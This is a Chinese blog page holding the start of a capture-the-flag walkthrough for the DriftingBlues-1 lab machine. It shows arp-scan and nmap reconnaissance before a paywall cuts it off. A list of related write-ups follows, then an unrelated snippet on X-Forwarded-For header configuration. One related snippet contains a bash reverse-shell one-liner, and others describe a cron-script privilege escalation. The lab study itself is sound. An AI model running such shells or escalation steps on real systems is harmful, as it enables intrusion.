Hackmyvm综合靶机 | Driftingblues-1

已于 2022-04-06 18:05:59 修改
阅读量3.3k 收藏 4
点赞数 2
CC 4.0 BY-SA版权
分类专栏: # 靶场WP 文章标签: 安全 web安全 linux
于 2022-04-01 16:36:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45996361/article/details/123901694

前提概要

靶场地址:https://www.vulnhub.com/entry/driftingblues-1,625/,是一个极其简单的靶场,需要具备以下前置知识:

  • 基础的Linux命令及操作
  • 基础的渗透测试工具使用(Kali / nmap下的工具)

二珂说:这个靶机系列是跟着新仔一起入坑的,他太卷了,咱们也不能速度太慢了!!!后面还会再次复习DC靶机的实现过程…

信息收集

arp-scan 192.168.132.0/24

image-20220401150711160

之前都是扫出目标后就之间nmap一把梭

后面了解到这样容易暴露目标

所以我们一步一步来

#先扫端口
nmap -p- 192.168.132.158

#扫出来端口再扫描相关服务版本
 nmap -sV -A -p- -T4 192.168.132.158

image-20220401150652453

既然开启了80端口HTTP服务那必须访问一波web页面寻找有用信息

扫了一遍web页面发现俩个邮箱,后面应该有用

[email protected][email protected]

密码破解

再审查一下页面源代码(第一次审查源代码,之前打DC系列的时候都没有思考过)

最低0.47元/天 解锁文章

200万优质内容无限畅学
Hackmyvm综合靶机 | Driftingblues-4
IerkeU的博客
04-11 1987
Driftingblues-4靶机过程记录
Hackmyvm综合靶机 | Driftingblues-5
IerkeU的博客
04-14 647
当我们需要将项目部署到远程服务器或者在服务器之间传输数据时,经常会使用scp命令(linux 系统下基于 ssh 登陆进行安全的远程文件拷贝命令)
靶机渗透练习01-driftingblues1
Force~
03-24 1939
靶机地址: https://www.vulnhub.com/entry/driftingblues-1,625/ ###1、主机探活 arp-scan -I eth0 -l (指定网卡扫) masscan 192.168.184.0/24 -p 80,22 netdiscover -i eth0 -r 192.168.184.0/24 ###2、端口扫描 nmap -A -sV -T4 -p- 192.168.111.8 ###3、访问80端口,遇事不决,目录扫描来一波 gobuster .
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-1
Aluxian_的博客
06-02 1261
Vulnhub靶机DriftingBlues-1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。 Vulnhub靶机下载: 官网地址: https://w
vulnhub靶机DriftingBlues: 1渗透笔记
liver100day的博客
07-24 2162
文章目录环境准备渗透过程1.信息收集1.1 主机发现1.2 端口扫描1.4 访问80端口(http服务)1.3 目录爆破2.漏洞利用(暴力破解)3.提权4.总结 环境准备 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.128 靶机:DC-7 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/driftingblues-1,625/ 渗透过程 1.信息收集 1.1 主机发现 首先我们先得获取目标靶机IP,没有IP我们无从开始工作,使用nmap进行扫
vulnhub--DriftingBlues: 1
weixin_45922278的博客
03-28 1267
描述 获得标志 难度:容易 关于vm:已测试并从virtualbox导出 目录 1.nmap端口扫描 2.目录扫描 二、漏洞探测&利用 三、getshell & 提权 四、总结 一、信息收集 1.nmap端口扫描 nmap -A -T4 -v -p- 192.168.43.73 2.目录扫描 先将driftingblues.box加入到hosts文件中。 gobuster dir -u http://driftingblues.box...
Hackmyvm综合靶机 | Driftingblues-2
IerkeU的博客
04-06 2384
前言提要 今天在打靶机的时候遇见了一个新问题:Vulnhub靶机检测不到IP地址!!!!其原因也许是因为网卡服务启动失败。 所以这里也教一下大家当靶机探测不到IP地址的时候如何对靶机进行相关配置修改,也方便后续我再次遇见这种问题的时候知道如何操作 解决步骤 因为靶机我们是不知道账号密码的,所以只能通过拯救模式进行操作 在开机时按下Shift键进入界面,再按e键,进入以下界面 将ro 替换为 rw signie init=/bin/bash 同时按下Ctrl+X键,进入以下页面 查看当前网卡
Hackmyvm综合靶机 | Driftingblues-3
IerkeU的博客
04-08 655
Driftingblues-3靶机渗透详细过程记录
DriftingBlues: 1渗透测试
sucker的博客
10-29 935
15,换个思路找靶机内存在root权限执行的文件或者脚本,在查看/tmp目录时发现目录下存在备份文件,查看/var目录,果然有一个backups文件夹,查看文件夹里的文件内容,有一个备份文件脚本backup.sh,该文件执行的命令是root权限的。16,查看backup.sh文件的内容,发现提示说有一个backdoor,且用sudo命令执行了/tmp/emergency文件。10,使用dirb工具扫描网站目录,发现robots.txt文件,访问该文件,获得 /robots.txt 文件。
Driftingblues靶机01
qq_37301470的博客
06-01 373
基于kali的渗透 vlunhub靶机
vulnhub靶场之driftingblues-1
qq_58091216的博客
02-24 1035
backup.sh的内容就是用zip命令把/var/www目录下的所有内容打包为/tmp/backup.zip,然后sudo /tmp/emergency,在前面/tmp中找到了这个压缩文件,但是并没有找到emergency文件,需要创建emergency文件,并将eric用户加入sudo组。截止到目前,我们没有扫描到如何有用的信息,我们想想还有什么办法,突然想到源代码我们没有查看,我们进行查看。可能跟ssh登录有关系,果然是ssh登录的密码,不过末尾有数字,其他的都是404。
Vulnhub--DriftingBlues-1靶机通关详解
m0_72634167的博客
03-21 2131
1.自动任务提权的思路2.gobuster工具爆破子域名3.crunch生成密码列表的命令行工具的使用。
靶机渗透练习01-driftingblues
hirak0的博客
04-13 1441
靶机描述 靶机地址:https://www.vulnhub.com/entry/driftingblues-1,625/ Description get flags difficulty: easy about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email (it should be on my profile) for troubleshoo
vulnhub靶场【DriftingBlues】之1
China_I_LOVE的博客
12-14 1075
考察解码解密考察子域名搜索,这里因为是靶机,在本地,不过也是考察子域名的收集以及目录爆破,如果是真实操作,是需要子域名收集的,这里是虚拟探测vhost考察获取系统的进程,这里是查看发现有这个文件,猜测有定时操作,只是这里查看是查看不到的,所以借助工具pspy这里是确定靶机系统为64位,所以使用pspy64bash的基本反弹shell。
driftingblues靶机(0ok编码)
m0_66299232的博客
12-12 686
2.一顿命令探测没有可利用的,我直接上传了一个linpeas.sh(github里有)脚本,给他可执行权限就可以运行。2.echo 'L25vdGVmb3JraW5nZmlzaC50eHQ=' -n | base64 -d //解码。bash -i >& /dev/tcp/192.168.1.105/4444 0>&1 //反弹shell。/bin/bash' > emergency //要执行bash命令。5.把域名添加到/etc/hosts 下 再用source刷新。4.再次查看源码,发现一个用户名。
靶机18 driftingblues1
honest_gg的博客
10-31 1294
获取标志 难度:简单
Vulnhub靶机driftingblues 1
qq_48904485的博客
01-13 987
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机driftingblues110.0.2.17)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/driftingblues-1,625/
DriftingBlues-1靶机进行渗透测试
zll___的博客
04-01 278
DriftingBlues-1靶机进行渗透测试
Hackmyvm综合靶机 | Driftingblues-6
IerkeU的博客
04-14 2906
靶机(X-Forwarded-For)
最新发布
02-23
### 关于靶机中 X-Forwarded-For 的使用场景及配置方法 #### 使用场景 `X-Forwarded-For` 是一个HTTP头字段,通常由代理服务器、负载均衡器或其他中间件设置。该头部用于识别通过HTTP代理或负载平衡器之后的客户端原始IP地址。当请求经过多个中介节点时,每个节点可以在 `X-Forwarded-For` 头部追加自己的IP地址,形成一系列的IP列表[^4]。 对于Web应用程序而言,在处理来自外部网络的流量时,如果前端部署有反向代理,则应用本身接收到的是代理服务器的IP而非最终用户的实际公网IP。此时就需要依赖 `X-Forwarded-For` 来获取真实的访问者信息[^2]。 #### 配置方法 在Linux环境下(如Ubuntu),可以通过修改Nginx或Apache等Web服务器配置文件来支持并信任特定来源的 `X-Forwarded-For` 请求头: ##### Nginx 配置示例 编辑站点配置文件 `/etc/nginx/sites-available/default` 或其他自定义位置下的相应配置文件,加入如下内容: ```nginx location / { proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; } ``` 上述配置使得Nginx能够正确转发客户端的真实IP给后端的应用程序,并且会自动累加现有的 `X-Forwarded-For` 值。 ##### Apache 配置示例 针对Apache Web Server, 修改 `.htaccess` 文件或者主配置文件中的 `<VirtualHost>` 指令部分,添加以下指令: ```apache RequestHeader set X-Forwarded-Proto "https" SetEnvIf X-Forwarded-For "^.*\..*\..*\.." forwarded=yes RequestHeader append X-Forwarded-For %{REMOTE_ADDR}s env=forwarded ``` 这段代码实现了类似的功能——即确保每次请求都携带更新后的 `X-Forwarded-For` 字段传递至下游服务。 为了使更改生效,记得重启相应的Web服务器进程: ```bash sudo systemctl restart nginx # or for apache sudo systemctl restart apache2 ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1erkeU

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值